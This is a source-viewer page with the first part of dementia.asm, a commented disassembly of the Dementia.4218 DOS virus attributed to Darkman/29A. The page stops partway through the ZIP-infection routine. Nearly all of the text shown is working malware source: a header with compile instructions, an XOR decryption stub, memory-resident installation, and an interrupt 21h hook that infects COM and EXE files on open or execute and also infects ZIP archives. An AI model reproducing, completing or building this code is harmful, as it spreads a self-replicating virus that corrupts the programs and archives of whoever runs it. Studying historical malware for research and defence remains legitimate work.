📄 dementia.asm
字号:
comment *
Dementia.4218
Disassembly by
Darkman/29A
Dementia.4218 is a 4218 bytes parasitic resident COM/EXE/ZIP virus. Infects
files at close file, open file and load and/or execute program by appending
the virus to the infected COM/EXE file and storing in the infected ZIP file.
Dementia.4218 has an error handler, 16-bit exclusive OR (XOR) encryption in
file and is using archive infection technique.
To compile Dementia.4218 with Turbo Assembler v 4.0 type:
TASM /M DEMENTI_.ASM
TLINK /x DEMENTI_.OBJ
EXE2BIN DEMENTI_.EXE DEMENTI_.COM
*
.model tiny
.code
code_begin:
call delta_offset
delta_offset:
pop si ; Load SI from stack
add si,(crypt_begin-delta_offset-02h)
mov di,si ; DI = offset of code_end - 02h
std ; Set direction flag
mov cx,(crypt_begin-crypt_end-02h)/02h
decrypt_key equ word ptr $+01h ; Decryption key
mov dx,00h ; DX = decryption key
push cs cs ; Save segments at stack
pop ds es ; Load segments from stack (CS)
decrypt_loop:
lodsw ; AX = word of encrypted code
xor ax,dx ; Decrypt two bytes
stosw ; Store two plain bytes
jmp crypt_end
nop
crypt_end:
loop decrypt_loop
cld ; Clear direction flag
push cs ; Save CS at stack
sub si,(crypt_end-code_begin)
nop
mov cl,04h ; Divide by paragraphs
shr si,cl ; SI = offset of crypt_end in para...
mov ax,cs ; AX = code segment
add ax,si ; Add code segment to delta offset...
push ax ; Save AX at stack
lea ax,virus_begin ; AX = offset of virus_begin
push ax ; Save AX at stack
retf ; Return far!
virus_begin:
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
pop ax ; Load AX from stack (CS)
mov [code_seg_],ax ; Store code segment
mov bx,1492h ; Dementia.4218 function
call close_file
cmp bx,1776h ; Already resident?
je virus_exit ; Equal? Jump to virus_exit
call install
virus_exit:
mov ah,[com_or_exe] ; AH = COM or EXE executable?
cmp ah,00h ; COM executable?
nop
je vir_com_exit ; Equal? Jump to vir_com_exit
mov ax,[code_seg_] ; AX = code segment
mov bx,[initial_cs] ; AX = initial CS relative to star...
sub ax,bx ; Subtract initial CS relative to ...
mov dx,ax ; DX = segment of PSP for current ...
mov bx,[code_seg] ; BX = original code segment
add ax,bx ; Add original code segment to seg...
mov [code_seg],ax ; Store original code segment
xchg ax,dx ; AX = segment of current PSP proc...
cli ; Clear interrupt-enable flag
mov bx,[stack_seg] ; BX = original stack segment
add ax,bx ; Add original stack segment to se...
mov ss,ax ; SS = original stack segment
mov ax,[stack_ptr] ; AX = original stack pointer
mov sp,ax ; SP = " " "
sti ; Set interrupt-enable flag
mov ah,62h ; Get current PSP address
int 21h
mov ds,bx ; DS = segment of PSP for current ...
mov es,bx ; ES = segment of PSP for current ...
xor ax,ax ; Zero AX
xor bx,bx ; Zero BX
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
xor si,si ; Zero SI
xor di,di ; Zero DI
jmp dword ptr cs:[instruct_ptr]
vir_com_exit:
mov di,100h ; DI = offset of beginning of code
lea si,origin_code ; SI = offset of origin_code
nop
movsw ; Move the original code to beginning
movsb ; " " " " " "
push es ; Save ES at stack
mov ax,100h ; AX = offset of beginning of code
push ax ; Save AX at stack
xor ax,ax ; Zero AX
xor bx,bx ; Zero BX
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
xor si,si ; Zero SI
xor di,di ; Zero DI
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
retf ; Return far!
upcase_char proc near ; Upcase character
cmp al,'a' ; Lowcase character?
jl dont_upcase ; Less? Jump to dont_upcase
cmp al,'z' ; Lowcase character?
jg dont_upcase ; Greater? Jump to dont_upcase
sub al,20h ; Upcase character
dont_upcase:
ret ; Return!
endp
int21_virus proc near ; Interrupt 21h of Dementia.4218
pushf ; Save flags at stack
cld ; Clear direction flag
cmp ah,3eh ; Close file?
jne tst_open_fil ; Not equal? Jump to tst_open_fil
cmp bx,1492h ; Dementia.4218 function?
jne tst_open_fil ; Not equal? Jump to tst_open_fil
mov bx,1776h ; Already resident
popf ; Load flags from stack
iret ; Interrupt return!
tst_open_fil:
cmp ah,3dh ; Open file
jne tst_load_and ; Not equal? Jump to tst_load_and
cmp al,0ffh ; Dementia.4218 function
je dementia_fun ; Equal? Jump to dementia_fun
push ax si ; Save registers at stack
mov si,dx ; SI = offset of filename
find_dot:
lodsb ; AL = byte of filename
cmp al,00h ; End of filename?
je open_fi_exit ; Equal? Jump to open_fi_exit
cmp al,'.' ; Found the dot in the filename
jne find_dot ; Not equal? Jump to find_dot
lodsb ; AL = byte of extension
call upcase_char
cmp al,'C' ; COM executable?
jne tst_exe_exec ; Not equal? Jump to tst_exe_exec
lodsb ; AL = byte of extension
call upcase_char
cmp al,'O' ; COM executable?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
lodsb ; AL = byte of extension
call upcase_char
cmp al,'M' ; COM executable?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
call inf_com_exe
jmp open_fi_exit
nop
tst_exe_exec:
cmp al,'E' ; EXE executable?
jne tst_zip_arch ; Not equal? Jump to tst_zip_arch
lodsb ; AL = byte of extension
call upcase_char
cmp al,'X' ; EXE executable?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
lodsb ; AL = byte of extension
call upcase_char
cmp al,'E' ; EXE executable?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
call inf_com_exe
jmp open_fi_exit
nop
tst_zip_arch:
cmp al,'Z' ; ZIP archive?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
lodsb ; AL = byte of extension
call upcase_char
cmp al,'I' ; ZIP archive?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
lodsb ; AL = byte of extension
call upcase_char
cmp al,'P' ; ZIP archive?
jne open_fi_exit ; Not equal? Jump to open_fi_exit
call infect_zip
jmp open_fi_exit
nop
open_fi_exit:
pop si ax ; Load registers from stack
jmp tst_load_and
nop
dementia_fun:
mov al,02h ; Dementia.4218 function
tst_load_and:
cmp ah,4bh ; Load and/or execute program?
jne int21_exit ; Not equal? Jump to int21_exit
call inf_com_exe
int21_exit:
popf ; Load flags from stack
jmp cs:[int21_addr]
endp
install proc near ; Allocate memory, move virus to t...
push es ; Save ES at stack
mov ah,52h ; Get list of lists
int 21h
mov ax,es:[bx-02h] ; AX = segment of first memory con...
next_mcb:
mov ds,ax ; DS = segment of current memory c...
mov al,ds:[00h] ; AL = block type
cmp al,'Z' ; Last block in chain?
je allocate_mem ; Equal? Jump to allocate_mem
mov ax,ds ; AX = segment of current memory c...
mov bx,ds:[03h] ; BX = size of memory block in par...
add ax,bx ; Add size of memory block in para...
inc ax ; AX = segment of next memory cont...
jmp next_mcb
allocate_mem:
mov bx,ds:[03h] ; BX = size of memory block in par...
sub bx,(code_end-code_begin+0fh)/10h*02h
mov ds:[03h],bx ; Store new size of memory control...
mov ax,ds ; AX = segment of last memory cont...
add ax,bx ; Add new size of memory block in ...
inc ax ; AX = segment of virus
mov es,ax ; ES = " " "
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
xor si,si ; Zero SI
xor di,di ; Zero DI
mov cx,(code_end-code_begin)
rep movsb ; Move virus to top of memory
push es ; Save ES at stack
lea ax,install_ ; AX = offset of install_
push ax ; Save AX at stack
retf ; Return far!
install_:
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ax,3521h ; Get interrupt vector 21h
int 21h
mov word ptr [int21_addr+02h],es
mov word ptr [int21_addr],bx
lea dx,int21_virus ; DX = offset of int21_virus
mov ax,2521h ; Set interrupt vector 21h
int 21h
pop es ; Load ES from stack
ret ; Return!
endp
inf_com_exe proc near ; Infect COM/EXE file
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,06h ; Correct stack pointer
push ax bx cx dx si di ds es
call int24_store
call open_file
jc com_exe_exit ; Error? Jump to com_exe_exit
call load_info
and cx,0000000000011111b
cmp cx,0000000000000001b
je call_close ; Already infected? Jump to call_c...
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
mov cx,20h ; Read thirty-two bytes
call read_file
mov ax,ds:[00h] ; AX = EXE signature
cmp ax,'MZ' ; Found EXE signature?
je call_infect ; Equal? Jump to call_infect
cmp ax,'ZM' ; Found EXE signature?
je call_infect ; Equal? Jump to call_infect
call infect_com
jmp call_mark
nop
call_infect:
call infect_exe
call_mark:
call infect_mark
call_close:
call close_file
com_exe_exit:
call int24_load
pop es ds di si dx cx bx ax
mov sp,bp ; SP = stack pointer
pop bp ; Load BP from stack
ret ; Return!
endp
infect_zip proc near ; Infect ZIP archive
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,28h ; Correct stack pointer
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -